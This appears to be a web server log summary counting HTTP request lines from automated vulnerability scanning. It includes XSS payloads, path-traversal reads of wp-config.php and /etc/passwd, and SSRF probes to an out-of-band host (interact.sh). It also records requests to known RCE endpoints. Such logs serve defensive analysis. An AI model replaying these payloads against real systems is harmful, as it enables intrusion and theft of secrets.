1 GET /wp-content/plugins/disable-comments/readme.txt HTTP/1.1
1 GET /wp-content/plugins/duplicator/files/installer.cleanup.php?package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&remove=1 HTTP/1.1
1 GET /wp-content/plugins/easy-google-fonts/readme.txt HTTP/1.1
1 GET /wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported HTTP/1.1
1 GET /wp-content/plugins/fluentform/readme.txt HTTP/1.1
1 GET /wp-content/plugins/formidable/readme.txt HTTP/1.1
1 GET /wp-content/plugins/google-analytics-dashboard-for-wp/readme.txt HTTP/1.1
1 GET /wp-content/plugins/google-listings-and-ads/readme.txt HTTP/1.1
1 GET /wp-content/plugins/google-site-kit/readme.txt HTTP/1.1
1 GET /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10 HTTP/1.1
1 GET /wp-content/plugins/header-footer/readme.txt HTTP/1.1
1 GET /wp-content/plugins/idx-broker-platinum/ HTTP/1.1
1 GET /wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22 HTTP/1.1
1 GET /wp-content/plugins/insert-headers-and-footers/readme.txt HTTP/1.1
1 GET /wp-content/plugins/jh-404-logger/readme.txt HTTP/1.1
1 GET /wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-content/plugins/limit-login-attempts-reloaded/readme.txt HTTP/1.1
1 GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1
1 GET /wp-content/plugins/members/readme.txt HTTP/1.1
1 GET /wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E HTTP/1.1
1 GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1
1 GET /wp-content/plugins/nextgen-gallery/readme.txt HTTP/1.1
1 GET /wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract[.]sh HTTP/1.1
1 GET /wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-content/plugins/popup-builder/readme.txt HTTP/1.1
1 GET /wp-content/plugins/really-simple-ssl/readme.txt HTTP/1.1
1 GET /wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php HTTP/1.1
1 GET /wp-content/plugins/simple-page-ordering/readme.txt HTTP/1.1
1 GET /wp-content/plugins/siteorigin-panels/readme.txt HTTP/1.1
1 GET /wp-content/plugins/socialfit/popup.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&service=googleplus HTTP/1.1
1 GET /wp-content/plugins/ssl-insecure-content-fixer/readme.txt HTTP/1.1
1 GET /wp-content/plugins/super-forms/ HTTP/1.1
1 GET /wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php HTTP/1.1
1 GET /wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-content/plugins/under-construction-page/readme.txt HTTP/1.1
1 GET /wp-content/plugins/updraftplus/includes/ HTTP/1.1
1 GET /wp-content/plugins/updraftplus/readme.txt HTTP/1.1
1 GET /wp-content/plugins/use-any-font/readme.txt HTTP/1.1
1 GET /wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https[:]//interact[.]sh HTTP/1.1
1 GET /wp-content/plugins/webp-express/readme.txt HTTP/1.1
1 GET /wp-content/plugins/woocommerce-pdf-invoices-packing-slips/readme.txt HTTP/1.1
1 GET /wp-content/plugins/wordpress-popup/views/admin/ HTTP/1.1
1 GET /wp-content/plugins/wp-fastest-cache/readme.txt HTTP/1.1
1 GET /wp-content/plugins/wp-mail-smtp/readme.txt HTTP/1.1
1 GET /wp-content/plugins/wp-optimize/readme.txt HTTP/1.1
1 GET /wp-content/plugins/wp-pagenavi/readme.txt HTTP/1.1
1 GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1
1 GET /wp-content/plugins/yith-woocommerce-compare/readme.txt HTTP/1.1
1 GET /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd HTTP/1.1
1 GET /wp-content/themes/Attitude/go.php?https[:]//interact[.]sh/ HTTP/1.1
1 GET /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php HTTP/1.1
1 GET /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1
1 GET /wp-content/themes/diarise/download.php?calendar=file:///etc/passwd HTTP/1.1
1 GET /wp-content/themes/eatery/nav.php?-Menu-=https[:]//interact[.]sh/ HTTP/1.1
1 GET /wp-content/themes/weekender/friend.php?id=aHR0cHM6Ly9pbnRlcmFjdC5zaA== HTTP/1.1
1 GET /wp-content/uploads/tmm_db_migrate/tmm_db_migrate.zip HTTP/1.1
1 GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ HTTP/1.1
1 GET /wp-content/uploads/wpjobboard/ HTTP/1.1
1 GET /wp/wp-content/uploads/wpjobboard/ HTTP/1.1
1 GET /wt2parser.cgi?home_en HTTP/1.1
1 GET /xml/User/User.xml HTTP/1.1
1 GET /xmlrpc.php HTTP/1.1
1 GET /zabbix/index_sso.php HTTP/1.1
1 GET http[:]//checkip[.]amazonaws[.]com?Z78126052220Q1 HTTP/1.1
2 OPTIONS / HTTP/1.1
1 POST /(download)/tmp/poc.txt HTTP/1.1
1 POST /.%250d./.%250d./.%250d./.%250d./bin/sh HTTP/1.1
1 POST /AdminTools/querybuilder/logon?framework HTTP/1.1
1 POST /EemAdminService/EemAdmin HTTP/1.1
1 POST /SamlResponseServlet HTTP/1.1
1 POST /Side.php HTTP/1.1
1 POST /TransferredOutModal.php?modfunc=detail HTTP/1.1
1 POST /WEB_VMS/LEVEL15/ HTTP/1.1
1 POST /_search HTTP/1.1
1 POST /account/index.php HTTP/1.1
2 POST /account HTTP/1.1
1 POST /actions/authenticate.php HTTP/1.1
1 POST /actuator/gateway/refresh HTTP/1.1
1 POST /actuator/gateway/routes/2Lw02doD4fJH2w5e63zdW0aGBx7 HTTP/1.1
3 POST /admin/ajax.php?action=login HTTP/1.1
1 POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1
1 POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1
1 POST /api/graphql HTTP/1.1
3 POST /api/login HTTP/1.1
1 POST /api/user/login HTTP/1.1
1 POST /api/user/signup/step2 HTTP/1.1
1 POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1
1 POST /apisix/admin/user/login HTTP/1.1
4 POST /boaform/admin/formLogin HTTP/1.1
2 POST /cgi-bin/login.cgi HTTP/1.1
1 POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1
1 POST /cgi-bin/rpc HTTP/1.1
1 POST /cgi/networkDiag.cgi HTTP/1.1
1 POST /cgi?2 HTTP/1.1
1 POST /cgi?7 HTTP/1.1
2 POST /cobbler_api HTTP/1.1
1 POST /conf_mail.php HTTP/1.1
1 POST /control/login HTTP/1.1
1 POST /debug/pyspidervulntest/run HTTP/1.1
1 POST /directdata/direct/router HTTP/1.1
1 POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
1 POST /en/php/usb_sync.php HTTP/1.1
1 POST /examples/jsp/security/protected/j_security_check HTTP/1.1
1 POST /geoserver/j_spring_security_check HTTP/1.1
2 POST /getcfg.php HTTP/1.1
1 POST /goform/setmac HTTP/1.1
1 POST /graphql HTTP/1.1
1 POST /homeaction.php HTTP/1.1
1 POST /index.php/bbs/index/download?local=1&name=1.txt&url=/etc/passwd HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
3 POST /index.php HTTP/1.1
1 POST /index/gettunnel HTTP/1.1
1 POST /integration/saveGangster.action HTTP/1.1
2 POST /jars/upload HTTP/1.1
1 POST /kindeditor/php/demo.php HTTP/1.1
2 POST /login.cgi HTTP/1.1
1 POST /login.php?action=login&type=admin HTTP/1.1
3 POST /login.php HTTP/1.1
3 POST /login HTTP/1.1
1 POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1
1 POST /lucee/2Lw01NRyoK8Eal9tPqGIfxQoBrz.cfm HTTP/1.1
1 POST /lucee/admin/imgProcess.cfm?file=/../../../context/2Lw01NRyoK8Eal9tPqGIfxQoBrz.cfm HTTP/1.1
1 POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1
1 POST /magmi/web/magmi_run.php HTTP/1.1
1 POST /magmi/web/magmi_saveprofile.php HTTP/1.1
1 POST /mailingupgrade.php HTTP/1.1
1 POST /maint/index.php?packages HTTP/1.1
2 POST /nacos/v1/cs/configs?content=helloWorld&dataId=nacos.cfg.dataIdfoo&group=foo HTTP/1.1
6 POST /oauth/token HTTP/1.1
1 POST /opennms/j_spring_security_check HTTP/1.1
1 POST /opensis/index.php HTTP/1.1
1 POST /orders/3 HTTP/1.1
1 POST /php/demo.php HTTP/1.1
1 POST /rest/issueNav/1/issueTable HTTP/1.1
1 POST /seeyon/thirdpartyController.do HTTP/1.1
1 POST /sess-bin/login_handler.cgi HTTP/1.1
1 POST /share/page/dologin HTTP/1.1
1 POST /struts2-rest-showcase/orders/3 HTTP/1.1
1 POST /sysShell HTTP/1.1
1 POST /system/sharedir.php HTTP/1.1
1 POST /templates/default/html/windows/right.php HTTP/1.1
1 POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1
3 POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
2 POST /tools.cgi HTTP/1.1
1 POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1
1 POST /upload HTTP/1.1
1 POST /user/register?_wrapper_format=drupal_ajax&ajax_form=1&element_parents=account/mail/%23value HTTP/1.1
1 POST /v2/query HTTP/1.1
1 POST /webmail/basic/ HTTP/1.1
1 POST /website/blog/ HTTP/1.1
2 POST /wls-wsat/CoordinatorPortType HTTP/1.1
1 POST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1
5 POST /wp-admin/admin-ajax.php HTTP/1.1
1 POST /wp-login.php HTTP/1.1
1 POST /ws/v1/cluster/apps/new-application HTTP/1.1
1 POST /xmlpserver/services/XMLPService HTTP/1.1
1 POST /xmlrpc.php HTTP/1.1
3 PRI * HTTP/2.0
1 PUT /v1/agent/service/register HTTP/1.1
1 PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1
1 TRACE / HTTP/1.1